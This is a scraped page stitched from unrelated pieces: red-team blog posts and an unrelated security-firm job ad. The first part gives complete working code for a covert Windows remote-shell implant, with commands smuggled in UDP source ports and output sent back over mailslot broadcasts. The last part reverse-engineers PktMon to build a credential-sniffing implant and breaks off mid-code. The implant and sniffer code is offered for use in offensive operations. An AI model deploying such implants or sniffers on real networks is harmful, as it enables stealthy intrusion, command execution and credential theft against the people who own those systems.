|| (event->header.timeStamp.dwHighDateTime == ft.dwHighDateTime && event->header.timeStamp.dwLowDateTime > ft.dwLowDateTime)
)
)
{
rinaddr.s_addr = htonl(event->header.remoteAddrV4);
ft.dwHighDateTime = event->header.timeStamp.dwHighDateTime;
ft.dwLowDateTime = event->header.timeStamp.dwLowDateTime;
//printf("[%s] - %x - %x\n", inet_ntoa(rinaddr), event->header.localPort, event->header.remotePort);
char partialOut[3] = { 0 };
memcpy(partialOut, &event->header.remotePort, 2);
printf("%s", partialOut);
}
}
}
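/* Free the event array and close the engine: this function runs once per second */
if (events) FwpmFreeMemory0((void**)&events);
if (engineHandle) FwpmEngineClose0(engineHandle);
}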
int main(int argc, char** argv) {
ft.dwHighDateTime = 0;
ft.dwLowDateTime = 0;
for (;;) {
detectHit();
Sleep(1000);
}
return 0;
}
Now we can try to send packets to a predefined port (for example, 123/UDP), encoding a message in the source ports. Keep in mind that we don’t care about the content because our information is carried in the source port (this means: please, try to make the payload as similar as possible to a real and “regular” packet of the protocol that you are trying to simulate).
import sys
from scapy.all import *
def textToPorts(text):
chunks = [text[i:i+2] for i in range(0, len(text), 2)]
for chunk in chunks:
send(IP(dst=sys.argv[1])/UDP(dport=123,sport=int("0x" + chunk[::-1].encode("hex"), 16))/Raw(load="Use stealthier packet in a real operation, pls"))
if __name__ == "__main__":
while 1:
command = raw_input("Insert text> ")
textToPorts(command)
We can see how it worked like a charm:
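The script above targets Python 2 (raw_input, str.encode("hex")). As a rough Python 3 sketch of just the encoding step, without Scapy, the two helpers below show how text maps to source ports and back. The function names are made up for illustration, and the decoder assumes a little-endian listener, which is what the memcpy() of remotePort in the C code relies on.

```python
import struct


def text_to_ports(text: str) -> list:
    """Split text into 2-byte chunks and read each chunk as a little-endian port."""
    data = text.encode("latin-1")
    return [int.from_bytes(data[i:i + 2], "little") for i in range(0, len(data), 2)]


def ports_to_text(ports) -> str:
    """Mirror the listener: copy the 2 bytes of each port and stop at the first NUL."""
    out = b"".join(struct.pack("<H", p).split(b"\x00", 1)[0] for p in ports)
    return out.decode("latin-1")
```

For example, "ab" becomes the single source port 0x6261, and a trailing odd character such as the "r" in "dir" is sent alone as 0x0072.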
Right now we can listen without sockets. Let’s move to the next task!
Working with mailslots is pretty easy. We only need to open a handle to \\*\MAILSLOT\BROWSE and write to it as we do with regular files. The \\*\ prefix indicates that the message has to be broadcast to the whole domain.
As with any protocol, we have to keep some kind of “structure” to avoid crafting an excessively malformed packet. Luckily for us, the CIFS BROWSER protocol is very lazy and we can easily find a suitable request. To look for candidates we can just loop from 0x00 to 0xFF, writing each value as the first byte of a message to the handle:
#include <windows.h>
#include <stdio.h>
int main(int argc, char** argv) {
HANDLE hMailslot = NULL;
DWORD dwWritten;
hMailslot = CreateFileA("\\\\*\\MAILSLOT\\BROWSE", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
for (int i = 0x00; i <= 0xFF; i++) {
char message[14] = { 0 };
snprintf(message, 14, "%cHello World!",i);
WriteFile(hMailslot, message, 14, &dwWritten, NULL);
}
CloseHandle(hMailslot);
return 0;
}
As we can see, most of the messages are interpreted as “malformed packets” or are undefined in the protocol standard:
The best candidate appears to be the GetBackupListRequest command, which uses 0x09 as its opcode:
To retrieve the information at our end we can sniff the network using Scapy:
# ...
def getPacket(pkt):
needle = "BROWSE\x00\x00\x00\x09"
data = pkt[Raw].load
if needle in data:
sys.stdout.write(data[data.find(needle) + len(needle):])
sys.stdout.flush()
def monitor():
sniff(prn=getPacket, filter="port 138 and host " + sys.argv[1], iface=sys.argv[2])
# ...
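The matching logic in getPacket() can be isolated as a pure function, which makes it easy to check without sniffing anything. This is a Python 3 sketch working on bytes; extract_output is a hypothetical helper name, and the needle is the same one used in the snippet above.

```python
# Mailslot name tail, padding and the 0x09 opcode, as used by the sniffer above.
NEEDLE = b"BROWSE\x00\x00\x00\x09"


def extract_output(payload: bytes):
    """Return the bytes that follow the needle, or None when it is not present."""
    idx = payload.find(NEEDLE)
    if idx == -1:
        return None
    return payload[idx + len(NEEDLE):]
```

In a Scapy callback this would be fed with the raw payload of each packet, after checking that the packet actually carries a Raw layer.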
Before continuing we need to clarify some points that must be taken into consideration. The most important: this kind of approach will only work if there are no network elements that could mask the source port. In complex infrastructures you need to be close (usually in the same network segment) in order to perform this technique. If a NAT-like device sits between you and the sleeping box it is most likely that the information encoded as source port is going to be overwritten.
Secondly, in our PoC we are just using one port to transfer the information for the sake of brevity. In a real implant, you need to knock at least three different ports:
Also something really, really, really important: when the first port is hit (the “wake up”) we have to save the IP that contacted us, and then use it as a criterion when reading input events. This matters a lot to avoid inserting corrupted data read from stray packets sent by other machines. We need to match both the port chosen to carry the input AND the IP that woke us up.
For this very same reason we need to add an extra condition to the wake-up: not only does a selected port have to be knocked, the source port also has to be one that would not be used in a natural environment (for example 666).
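The wake-up and filtering rules described above can be sketched as a tiny state machine. This is only a Python 3 model of the decision logic, not part of the PoC: the class name, the port numbers 123 and 124 and the two-port layout are assumptions chosen for illustration, while the source port 666 is the example given in the text.

```python
WAKE_DST_PORT = 123   # hypothetical port that must be knocked to wake up
WAKE_SRC_PORT = 666   # unlikely source port used as the wake-up marker
DATA_DST_PORT = 124   # hypothetical port chosen to carry the input


class KnockState:
    def __init__(self):
        self.operator_ip = None  # IP that woke us up, None while sleeping

    def handle(self, src_ip, src_port, dst_port):
        """Return the 2 input bytes carried by this event, or None if ignored."""
        if self.operator_ip is None:
            # Sleeping: only the exact wake-up knock is accepted.
            if dst_port == WAKE_DST_PORT and src_port == WAKE_SRC_PORT:
                self.operator_ip = src_ip
            return None
        # Awake: input must come from the waker AND hit the data port.
        if src_ip != self.operator_ip or dst_port != DATA_DST_PORT:
            return None
        return src_port.to_bytes(2, "little")
```

Stray packets from other hosts, or from the operator to other ports, never reach the shell's input.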
Lastly, we have to keep in mind that mailslots are size limited. We can only send 424 bytes per message.
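One way to respect that limit is to split the shell output into several messages before writing them to the mailslot. The Python 3 sketch below shows the arithmetic only. It assumes that the one-byte opcode counts against the 424 bytes, which the text does not state, and mailslot_messages is a hypothetical helper name.

```python
MAILSLOT_LIMIT = 424   # per-message limit quoted above
OPCODE = b"\x09"       # GetBackupListRequest opcode used as the first byte


def mailslot_messages(output: bytes, limit: int = MAILSLOT_LIMIT):
    """Split output into messages of at most `limit` bytes, opcode included."""
    room = limit - len(OPCODE)
    return [OPCODE + output[i:i + room] for i in range(0, len(output), room)]
```

The C PoC takes a simpler route and reads at most 400 bytes from the pipe at a time (BUFFER_SIZE), which keeps every message under the limit.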
After all this chit-chat let’s play a bit with our shitty PoC. Here comes the client:
# PoC by Juan Manuel Fernandez (@TheXC3LL)
import sys
import threading
from scapy.all import *
def textToPorts(text):
chunks = [text[i:i+2] for i in range(0, len(text), 2)]
for chunk in chunks:
send(IP(dst=sys.argv[1])/UDP(dport=123,sport=int("0x" + chunk[::-1].encode("hex"), 16))/Raw(load="Adepts of 0xCC here to make some noise, avoid this kind of obvious malformed packet with stupid messages ;)"), verbose=False)
def getPacket(pkt):
needle = "BROWSE\x00\x00\x00\x09"
data = pkt[Raw].load
if needle in data:
sys.stdout.write(data[data.find(needle) + len(needle):])
sys.stdout.flush()
def monitor():
sniff(prn=getPacket, filter="port 138 and host " + sys.argv[1], iface=sys.argv[2])
if __name__ == "__main__":
x = threading.Thread(target=monitor)
x.start()
while 1:
command = raw_input()
textToPorts(command + "\r\n")
And here the other part:
/* PoC by Juan Manuel Fernandez (@TheXC3LL) */
#include <windows.h>
#include <fwpmtypes.h>
#include <fwpmu.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib, "fwpuclnt.lib")
#pragma comment (lib, "Ws2_32.lib")
#define EXIT_ON_ERROR(err) if((err) != ERROR_SUCCESS) {goto CLEANUP;}
#define BUFFER_SIZE 400
FILETIME ft;
struct child_pipes {
HANDLE child_IN_R;
HANDLE child_IN_W;
HANDLE child_OUT_R;
HANDLE child_OUT_W;
};
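typedef struct child_pipes child_pipes;
/* Forward declaration: getCommand() calls write_to_pipe() before its definition */
int write_to_pipe(HANDLE pipe, LPSTR buff);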
DWORD InitFilterConditions(
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 numCondsIn,
__out_ecount_part(numCondsIn, *numCondsOut) FWPM_FILTER_CONDITION0* conds,
__out UINT32* numCondsOut,
__deref_out FWP_BYTE_BLOB** appId
)
{
*numCondsOut = 0;
return ERROR_SUCCESS;
}
DWORD FindRecentEvents(
__in HANDLE engine,
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 seconds,
__deref_out_ecount(*numEvents) FWPM_NET_EVENT0*** events,
__out UINT32* numEvents
)
{
DWORD result = ERROR_SUCCESS;
FWPM_NET_EVENT_ENUM_TEMPLATE0 enumTempl;
ULARGE_INTEGER ulTime;
FWPM_FILTER_CONDITION0 conds[4];
UINT32 numConds;
FWP_BYTE_BLOB* appBlob = NULL;
HANDLE enumHandle = NULL;
memset(&enumTempl, 0, sizeof(enumTempl));
// Use the current time as the end time of the window.
GetSystemTimeAsFileTime(&(enumTempl.endTime));
// Subtract the number of seconds specified by the caller to find the start
// time.
ulTime.LowPart = enumTempl.endTime.dwLowDateTime;
ulTime.HighPart = enumTempl.endTime.dwHighDateTime;
ulTime.QuadPart -= seconds * 10000000ui64;
enumTempl.startTime.dwLowDateTime = ulTime.LowPart;
enumTempl.startTime.dwHighDateTime = ulTime.HighPart;
result = InitFilterConditions(
appPath,
localAddr,
ipProtocol,
ARRAYSIZE(conds),
conds,
&numConds,
&appBlob
);
EXIT_ON_ERROR(result);
enumTempl.numFilterConditions = numConds;
if (numConds > 0)
{
enumTempl.filterCondition = conds;
}
result = FwpmNetEventCreateEnumHandle0(
engine,
&enumTempl,
&enumHandle
);
EXIT_ON_ERROR(result);
result = FwpmNetEventEnum0(
engine,
enumHandle,
INFINITE,
events,
numEvents
);
EXIT_ON_ERROR(result);
CLEANUP:
FwpmNetEventDestroyEnumHandle0(engine, enumHandle);
FwpmFreeMemory0((void**)&appBlob);
return result;
}
void getCommand(struct child_pipes* pipes) {
struct in_addr rinaddr;
HANDLE engineHandle = 0;
FWPM_NET_EVENT0** events = NULL, * event;
UINT32 numEvents = 0, i;
static const char* const types[] =
{
"FWPM_NET_EVENT_TYPE_IKEEXT_MM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_QM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_EM_FAILURE",
"FWPM_NET_EVENT_TYPE_CLASSIFY_DROP",
"FWPM_NET_EVENT_TYPE_IPSEC_KERNEL_DROP"
};
const char* type;
// Use dynamic sessions for efficiency and safety:
// - All objects associated with the dynamic session are deleted with one call.
// - Filtering policy objects are deleted even when the application crashes.
FWPM_SESSION0 session;
memset(&session, 0, sizeof(session));
session.flags = FWPM_SESSION_FLAG_DYNAMIC;
DWORD result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, &session, &engineHandle);
if (ERROR_SUCCESS == result)
{
result = FindRecentEvents(
engineHandle,
0,
0,
0,
100,
&events,
&numEvents
);
}
if (numEvents != 0)
{
for (i = 0; i < numEvents; ++i)
{
event = events[i];
type = (event->type < ARRAYSIZE(types)) ? types[event->type]
: "<unknown>";
if (event->header.ipVersion == FWP_IP_VERSION_V4 && event->header.ipProtocol == IPPROTO_UDP
&& (event->header.timeStamp.dwHighDateTime > ft.dwHighDateTime
|| (event->header.timeStamp.dwHighDateTime == ft.dwHighDateTime && event->header.timeStamp.dwLowDateTime > ft.dwLowDateTime)
)
)
{
rinaddr.s_addr = htonl(event->header.remoteAddrV4);
ft.dwHighDateTime = event->header.timeStamp.dwHighDateTime;
ft.dwLowDateTime = event->header.timeStamp.dwLowDateTime;
//printf("[%s] - %x - %x\n", inet_ntoa(rinaddr), event->header.localPort, event->header.remotePort);
char partialOut[3] = { 0 };
memcpy(partialOut, &event->header.remotePort, 2);
printf("%s", partialOut);
write_to_pipe(pipes->child_IN_W, partialOut);
}
}
}
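/* Free the event array and close the engine: this function runs on every loop iteration */
if (events) FwpmFreeMemory0((void**)&events);
if (engineHandle) FwpmEngineClose0(engineHandle);
}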
struct child_pipes* setup_pipes(void) {
struct child_pipes* pipes = NULL;
SECURITY_ATTRIBUTES saAttr;
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
pipes = (child_pipes*)malloc(sizeof(child_pipes));
/* The function returns a pointer, so failures are reported with NULL */
if (!CreatePipe(&pipes->child_OUT_R, &pipes->child_OUT_W, &saAttr, 0)) {
return NULL;
}
if (!CreatePipe(&pipes->child_IN_R, &pipes->child_IN_W, &saAttr, 0)) {
return NULL;
}
if (!SetHandleInformation(pipes->child_OUT_R, HANDLE_FLAG_INHERIT, 0)) {
return NULL;
}
if (!SetHandleInformation(pipes->child_IN_W, HANDLE_FLAG_INHERIT, 0)) {
return NULL;
}
return pipes;
}
void release_pipes(struct child_pipes* pipes) {
free(pipes);
}
int read_from_pipe(HANDLE pipe, LPSTR buff) {
BOOL bSuccess;
DWORD read;
if (!PeekNamedPipe(pipe, NULL, 0, NULL, &read, NULL)) {
return -1;
}
if (read) {
bSuccess = ReadFile(pipe, buff, BUFFER_SIZE, &read, NULL);
if (!bSuccess) {
return -1;
}
}
return read;
}
int write_to_pipe(HANDLE pipe, LPSTR buff) {
BOOL bSuccess;
DWORD written;
bSuccess = WriteFile(pipe, buff, strlen(buff), &written, NULL);
if (!bSuccess) {
return -1;
}
return written;
}
int create_childprocess(LPSTR binary, struct child_pipes* pipes) {
PROCESS_INFORMATION piProcInfo;
STARTUPINFOA siStartInfo = { 0 };
BOOL bSuccess = FALSE;
siStartInfo.cb = sizeof(STARTUPINFOA);
siStartInfo.hStdError = pipes->child_OUT_W;
siStartInfo.hStdOutput = pipes->child_OUT_W;
siStartInfo.hStdInput = pipes->child_IN_R;
siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
bSuccess = CreateProcessA(NULL,
binary,
NULL,
NULL,
TRUE,
0,
NULL,
NULL,
&siStartInfo,
&piProcInfo
);
if (!bSuccess) {
return -1;
}
CloseHandle(pipes->child_OUT_W);
CloseHandle(pipes->child_IN_R);
return piProcInfo.hProcess;
}
void sendOutput(LPSTR output, HANDLE hMailslot) {
char message[BUFFER_SIZE + 2] = { 0 };
DWORD dwWritten = 0;
snprintf(message, BUFFER_SIZE + 2, "\x09%s", output);
WriteFile(hMailslot, message, strlen(message) + 1, &dwWritten, NULL);
return;
}
int main(int argc, char** argv) {
ft.dwHighDateTime = 0;
ft.dwLowDateTime = 0;
int status = 0;
char buffer_stdout[BUFFER_SIZE + 1] = { 0 };
struct child_pipes* pipes = NULL;
int process = 0;
HANDLE hMailslot = NULL;
pipes = setup_pipes();
hMailslot = CreateFileA("\\\\*\\MAILSLOT\\BROWSE", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if ((process = create_childprocess("C:\\windows\\system32\\cmd.exe", pipes)) == -1) {
release_pipes(pipes);
return -1;
}
while (1) {
GetExitCodeProcess(process, &status);
if (status != STILL_ACTIVE) {
break;
}
do {
memset(buffer_stdout, 0, sizeof(buffer_stdout));
status = read_from_pipe(pipes->child_OUT_R, buffer_stdout);
if (status == -1) {
break;
}
else {
if (strlen(buffer_stdout) != 0) {
sendOutput(buffer_stdout, hMailslot);
}
}
} while (status != 0);
Sleep(300);
getCommand(pipes);
}
return 0;
}
Execute the Python script on your Linux machine, and then run the executable on the Windows machine as a privileged user. A shell should arrive :):
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
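DEVCORE (戴夫寇爾) has been established for nearly nine years. Over that time we have continuously studied advanced attack techniques, delivered high-quality penetration testing services to many clients, and become one of their most trusted security partners. In 2017 we became the first local vendor in Taiwan to offer a red team assessment service. Applying a hacker mindset that stops at nothing, we have carried out the most realistic and comprehensive attack exercises for e-commerce companies, government agencies, and financial institutions, accumulating extensive experience and case studies along the way and becoming the service provider with the deepest red team capability in Taiwan.
As the company grows, we are publicly recruiting red team talent for the first time. We hope to find one or two Support red team engineers to expand our back-office capacity and strengthen DEVCORE's ability to operate as a team, so that we can keep providing outstanding security services to enterprises.
We are very eager for you to join us. If you are interested in becoming part of DEVCORE, please see the job details below:
You will handle important support work in penetration testing and red team projects. This is the role with the clearest view of the overall engagement: you need to observe and record the state of the operation, organize complex engagement information carefully and patiently, and be happy to communicate the current situation to your teammates. After testing ends, you will compile the complete engagement information and the vulnerabilities found during testing into a report and a presentation, so that the client clearly understands the technical details and root cause of each vulnerability and can reproduce the findings from those details. Finally, you will help verify the client's remediation.
10:00 - 18:00 (one-hour break, 13:00 - 14:00)
10F, No. 168, Fuxing N. Rd., Zhongshan Dist., Taipei City. We will soon relocate near Taipei Stadium (MRT Taipei Arena Station).
The new office is being renovated; see our previous hiring posts for reference. The future office will be better than the old one.
We care about the physical and mental health of every colleague. Please see the following benefits:
NT$60,000 - 80,000 (guaranteed annual salary of 14 months)
We will contact you within two weeks. The recruitment process has three stages, in order: document review, online test, and interview. The second-stage online test will take place at the end of July at the earliest, so please be patient; the third-stage interview may be held online depending on the pandemic situation. For any questions about applying, please contact us by email only; we apologize for any inconvenience. Thank you for writing to us, and we look forward to having you join us!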
Dear Fellowlship, today’s homily is about how to add a sniffer to our implant. To accomplish this task we are going to dissect the native tool PktMon.exe, so we can learn about its internals in order to emulate its functionalities. Please, take a seat and listen to the story.
In this article we are going to touch on some topics that we are not familiar with, so it is possible that we make some minor mistakes. If you find any, please do not hesitate to contact us so we can correct them.
Some years ago we had to face a Red Team operation where at some point we discovered that a lot of machines were running a Backup service. This Backup service was old as hell and was composed of a central node and agents installed on each machine that were enrolled in this “central server”.
When a management task had to be executed (for example, to schedule a backup or to check agent stats) the central node sent the order to the target machine. To load those orders the central server had to authenticate against each agent and here comes the magic: the authentication was unencrypted and shared between machines. Getting those credentials meant RCE on all the machines that had the agent installed (to perform a backup task you could configure arbitrary pre/post system commands, so it was an insta-pwn). A lot of techniques can be used to intercept those credentials (injecting a hook, reversing the application in order to understand how the credentials are saved…), but undoubtedly the easiest and most painless way is to use a sniffer.
Today most of the communications between services are encrypted (SSL/TLS ftw!) and a sniffer inside a Red Team operation or a pentest is something that you are going to use only in a corner case. But learning new things is always useful: you never know when this info can save your ass. So here we are! Let’s build a shitty PoC able to sniff traffic!
In Windows we have the utility PktMon:
Packet Monitor (Pktmon) is an in-box, cross-component network diagnostics tool for Windows. It can be used for packet capture, packet drop detection, packet filtering and counting. The tool is especially helpful in virtualization scenarios, like container networking and SDN, because it provides visibility within the networking stack. Packet Monitor is available in-box via pktmon.exe command on Windows 10 and Windows Server 2019 (Version 1809 and later).
As the description states, this is exactly where we should start looking.
Before feeding our disassembler with PktMon.exe we can extract some clues about what we should focus on. First, the syntax page has this text:
Packet Monitor generates log files in ETL format. There are multiple ways to format the ETL file for analysis
We can deduce that we are interested in code related to Event Trace Log files. Also, the documentation for pktmon unload states:
Stop the PktMon driver service and unload PktMon.sys. Effectively equivalent to ‘sc.exe stop PktMon’. Measurement (if active) will immediately stop, and any state will be deleted (counters, filters, etc.).
If sc is involved, it means that we are going to deal with services, so the first thing to look for is functions related to “service”. With the symbol search in Binary Ninja we can find that OpenServiceW is used with the parameter “PktMon”, which rings a bell.
Checking for cross-references leads us to this other function, where we can clearly see how it calls our renamed OpenService_PktMon (where the OpenServiceW call was located) and, if everything goes OK, opens the device “PktMonDev”.
So far we know that PktMon starts a service called “PktMon” and opens a handle to the device “PktMonDev”. Playing with drivers means that we are going to deal with IOCTL codes. Indeed, if we check again for cross-references we can see how the handle obtained before is used in a DeviceIoControl call:
At this point we can use a mix of static and dynamic analysis to check which IOCTLs are used and for what task. Just run PktMon start -c --pkt-size 0 inside a debugger, put a breakpoint at DeviceIoControl and check where the IOCTL appears in the disassembly (the same approach works with Frida or any other tool that lets you hook the function to check the parameters).
After one hour wasted reversing this (yeah, we are slow as hell because our RE skills are close to zero) we noticed that System32 contains a DLL called PktMonApi.dll… and if you check the exports…
So… yes, we could have saved a lot of time figuring out what each call to DeviceIoControl does by just looking at this DLL. Shame on us!
The IOCTL for the “start” parameter is 0x220404. Let’s check the registers when DeviceIoControl is called with this code:
RAX : 0000000000000000
RBX : 0000000000220404
RCX : 0000000000000188 <= Handle to \\.\PktMonDev
RDX : 0000000000220404 <= IOCTL for "PktMonStart"
RBP : 0000000000000188
RSP : 00000077D027FC28
RSI : 00000077D027FDB8
RDI : 0000000000000014
R8 : 00000077D027FDB8 <= Input buffer
R9 : 0000000000000014 <= Input size
R10 : 00000FFF26BD722B
R11 : 00000077D027FCC0
R12 : 0000000000000000
R13 : 00000192BDDE0570
R14 : 0000000000000001
R15 : 0000000000000000
RIP : 00007FF935E9AC00 <kernelbase.DeviceIoControl>
To get the input transmitted to the driver we just have to read R9 bytes at the address contained in R8:
0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00
This message tells the driver to start capturing full packets (by default the packets are truncated to 128 bytes; with --pkt-size 0 we disable this limit).
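The IOCTL values seen so far follow the standard Windows CTL_CODE bit layout, so they can be split into their fields to see what kind of request they are. The following is a minimal, portable sketch (the struct and function names are our own, not part of any Windows header) that decodes a code by hand:

```c
#include <stdint.h>
#include <stdio.h>

/* Fields packed into a Windows I/O control code (CTL_CODE layout). */
typedef struct {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14 */
    uint32_t function;    /* bits 13..2  */
    uint32_t method;      /* bits 1..0   */
} ioctl_fields;

/* Split a 32-bit IOCTL value into its four CTL_CODE fields. */
ioctl_fields decode_ioctl(uint32_t code) {
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Print the decoded fields of an IOCTL value on one line. */
void print_ioctl(uint32_t code) {
    ioctl_fields f = decode_ioctl(code);
    printf("0x%06X: device=0x%X access=%u function=0x%X method=%u\n",
           (unsigned)code, (unsigned)f.device_type, (unsigned)f.access,
           (unsigned)f.function, (unsigned)f.method);
}
```

Calling print_ioctl(0x220404) gives device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x101 and method 0 (METHOD_BUFFERED), which fits with the input being passed as a plain buffer in R8/R9.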
If we want to add a filter (because we are only interested in a service that uses a given port) we need to use the IOCTL 0x220410, which takes a bigger input (0xD8 bytes) with the following layout:
As we can see, the marked XX II bytes correspond to the port. If we want to capture the traffic exchanged on port 14099 (0x3713, stored low byte first as 0x13, 0x37), our input buffer will be:
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
(...)
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
(...)
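Instead of hardcoding the whole buffer, the filter can be generated for any port. This is only a sketch under assumptions: the offsets 0x81 (the lone 0x04 byte, whose meaning we did not reverse) and 0xBA (the port) are read off the full 0xD8-byte array used in the PoC code of this article, and the port is assumed to be stored little-endian because 14099 is 0x3713. The macro and function names are made up for illustration.

```c
#include <stdint.h>
#include <string.h>

#define PKTMON_FILTER_SIZE 0xD8 /* input size observed for IOCTL 0x220410 */
#define FILTER_FLAG_OFFSET 0x81 /* position of the 0x04 byte in the PoC buffer (meaning unknown) */
#define FILTER_PORT_OFFSET 0xBA /* position of the 0x13, 0x37 bytes in the PoC buffer */

/* Fill `out` with a filter buffer equivalent to the hardcoded one, but for `port`. */
void build_port_filter(uint8_t out[PKTMON_FILTER_SIZE], uint16_t port) {
    memset(out, 0, PKTMON_FILTER_SIZE);
    out[FILTER_FLAG_OFFSET]     = 0x04;
    out[FILTER_PORT_OFFSET]     = (uint8_t)(port & 0xFF); /* low byte first */
    out[FILTER_PORT_OFFSET + 1] = (uint8_t)(port >> 8);   /* then high byte */
}
```

With port 14099 this reproduces the bytes shown above; any other layout detail of the structure remains unexplored.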
At this point we know how to communicate with the driver in order to initiate the capture of traffic and how to set capture filters based on ports. But… how are we going to collect and save the data? The MSDN page stated that packets are saved as ETL. Let’s search for symbols related to event logging!
If we set a breakpoint on those functions and run PktMon.exe we are going to hit them. We are interested in EnableTraceEx2 because it receives as parameter the provider GUID which indicates the event trace provider we are going to enable.
RAX : 0000000000000012
RBX : 0000017419FE01B0
RCX : 000000000000001A
RDX : 0000017419FE01B0
RBP : 0000003FB196F650
RSP : 0000003FB196F548
RSI : 0000017419FE01F0
RDI : 0000000000000000
R8 : 0000000000000001
R9 : 0000000000000004
R10 : 0000017419FC0000
R11 : 0000003FB196F430
R12 : 0000000000000000
R13 : 0000017419FE01B0
R14 : 0000000000000000
R15 : 0000000000000001
RIP : 00007FF8F7389910 <sechost.EnableTraceEx2>
The GUID is a 128-bit value. Let’s retrieve it from 17419FE01B0 (the address held in RDX, the second argument):
D9 80 4F 4D BD C8 73 4D BB 5B 19 C9 04 02 C5 AC
This translates to the GUID {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}. If we google this value we reach this reference from Microsoft’s repo that confirms it:
(...)
[RegisterBefore(NetEvent.UserData, MicrosoftWindowsPktMon, "{4d4f80d9-c8bd-4d73-bb5b-19c90402c5ac}")]
(...)
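The translation from the raw memory dump to the GUID string is not a straight byte-for-byte copy: the first three fields of a GUID are stored little-endian, while the last eight bytes are kept in order. A small sketch of that conversion (the function name is ours):

```c
#include <stdint.h>
#include <stdio.h>

/* Format 16 raw bytes, as dumped from memory on x86/x64 Windows, as a GUID string.
   `out` must hold at least 39 bytes (38 characters plus the terminator). */
void guid_bytes_to_string(const uint8_t b[16], char out[39]) {
    snprintf(out, 39,
             "{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}",
             b[3], b[2], b[1], b[0], /* Data1: 32-bit, little-endian */
             b[5], b[4],             /* Data2: 16-bit, little-endian */
             b[7], b[6],             /* Data3: 16-bit, little-endian */
             b[8], b[9],             /* Data4: plain byte order from here on */
             b[10], b[11], b[12], b[13], b[14], b[15]);
}
```

Feeding it the sixteen bytes read from the debugger yields the same string that appears in Microsoft's repo.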
To recap:
- PktMon starts the “PktMon” service and opens a handle to the \\.\PktMonDev device.
- It uses the IOCTL 0x220410 to set the filter and 0x220404 to start capturing traffic.
Ooook. We have enough info to start building our PoC.
MSDN provides an example of how to start a trace session. We are going to use this example as a base to enable the trace:
//...
#define LOGFILE_PATH "C:\\Windows\\System32\\ShabbySniffer.etl"
#define LOGSESSION_NAME "My Shabby Sniffer doing things"
//...
DWORD initiateTrace(void) {
static const GUID sessionGuid = { 0x6f0aaf43, 0xec9e, 0xa946, {0x9e, 0x7f, 0xf9, 0xf4, 0x13, 0x37, 0x13, 0x37 } };
static const GUID providerGuid = { 0x4d4f80d9, 0xc8bd, 0x4d73, {0xbb, 0x5b, 0x19, 0xc9, 0x04, 0x02, 0xc5, 0xac } }; // {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}
// Taken from https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-manifest-based-provider
ULONG status = ERROR_SUCCESS;
TRACEHANDLE sessionHandle = 0;
PEVENT_TRACE_PROPERTIES pSessionProperties = NULL;
ULONG bufferSize = 0;
BOOL TraceOn = TRUE;
bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + sizeof(LOGSESSION_NAME);
pSessionProperties = (PEVENT_TRACE_PROPERTIES)malloc(bufferSize);
ZeroMemory(pSessionProperties, bufferSize);
pSessionProperties->Wnode.BufferSize = bufferSize;
pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
pSessionProperties->Wnode.Guid = sessionGuid;
pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR;
pSessionProperties->MaximumFileSize = 50; // 50 MB
pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
pSessionProperties->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
StringCbCopyA(((LPSTR)pSessionProperties + pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);
status = StartTraceA(&sessionHandle, LOGSESSION_NAME, pSessionProperties);
if (status != ERROR_SUCCESS) {
printf("[!] StartTraceA failed!\n");
return -1;
}
status = EnableTraceEx2(sessionHandle, &providerGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
if (status != ERROR_SUCCESS) {
printf("[!] EnableTraceEx2 failed!\n");
return -1;
}
return 0;
}
//...
As this is just a PoC we are going to use the EVENT_TRACE_FILE_MODE_CIRCULAR file mode. There are other logging modes that may fit our purposes better (for example, generating a new file each time we reach the maximum size, so you can delete older files).
Implementing the driver communication is easy because the pseudocode obtained from Binary Ninja is pretty clear. First, let’s start the service and open a handle to the device:
//...
HANDLE PktMonServiceStart(void) {
SC_HANDLE hManager;
SC_HANDLE hService;
HANDLE hDriver;
BOOL status;
